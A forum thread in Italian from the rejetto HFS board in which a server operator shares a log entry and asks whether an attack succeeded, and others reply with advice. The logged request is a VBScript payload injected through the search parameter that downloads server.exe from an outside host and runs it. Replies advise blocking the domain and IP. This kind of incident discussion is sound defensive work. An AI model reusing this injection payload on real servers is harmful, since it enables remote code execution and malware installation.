rejetto forum

Software => Other languages => HFS ~ HTTP File Server => Italiano => Topic started by: _KrustY_ on January 16, 2018, 06:02:41 PM

Title: Probabile tentativo di eseguire comandi da remoto
Post by: _KrustY_ on January 16, 2018, 06:02:41 PM
BuonGiorno
uso da tempo HFS su un server dedicato con Windows server 2012
tengo sempre aggiornato HFS, ora ho la 2.3k
2 giorni fa ho trovato nel log questi comandi

Requested GET /?search=> Set Shell = CreateObject("Wscript.Shell")
> Post.Open "GET","http://yamanbeisi.com/server.exe%22,0
> Post.Send()
> Set aGet = CreateObject("ADODB.Stream")
> aGet.Mode = 3
> aGet.Type = 1
> aGet.Open()
> aGet.Write(Post.responseBody)
> aGet.SaveToFile "c:\server.exe",2
> wscript.sleep 1000
> Shell.Run ("c:\server.exe").}

Ho cercato il file server.exe in c: ma non c'è e non è nemmeno aperto come processo
Vorrei capire se questo tentativo di esecuzione del file è andato a buon fine e se è possibile bloccare qualsiasi richiesta di esecuzione di script o comandi shell

Grazie
Title: Re: Probabile tentativo di eseguire comandi da remoto
Post by: Mars on January 17, 2018, 06:28:02 PM
Certainly, this is an attempt to hack the server

the request included in the script come from china

Domain:       yamanbeisi.com
IP Address:       103.27.208.67
Region:       Chengdu (CN)

the file contains the following schema TR.Crypt.Xpack.srkhd

look at this report
http://r.virscan.org/report/eb5138fac75c231d89b69d93612310f2

the best thing to do is to have a good antivirus always updated, and to block the domain name of the link as well as the associated ip
Title: Re: Probabile tentativo di eseguire comandi da remoto
Post by: _KrustY_ on January 23, 2018, 04:43:35 PM
Ok Grazie Mars

Vorrei capire se c'è il modo di bloccare qualsiasi richiesta di esecuzione di script o comandi shell in HFS

Grazie
Ciaoo
Title: Re: Probabile tentativo di eseguire comandi da remoto
Post by: Mars on January 23, 2018, 06:24:47 PM
tradotto con google tanslate:

hfs è teoricamente protetto per non eseguire comandi come la macro del modello {. ... .}, potrebbero esserci varianti che non sono mai state testate o segnalate per rejetto. Dovresti avere la riga di comando completa del tentativo fraudolento di analizzare gli effetti, se non hai trovato una traccia di un programma, è che probabilmente il tentativo è fallito.

cosa fare mentre si attende che rejetto diventi consapevole della propria avventura è registrare il server di hosting in una lista di ban, così come l'indirizzo ip corrispondente in un firewall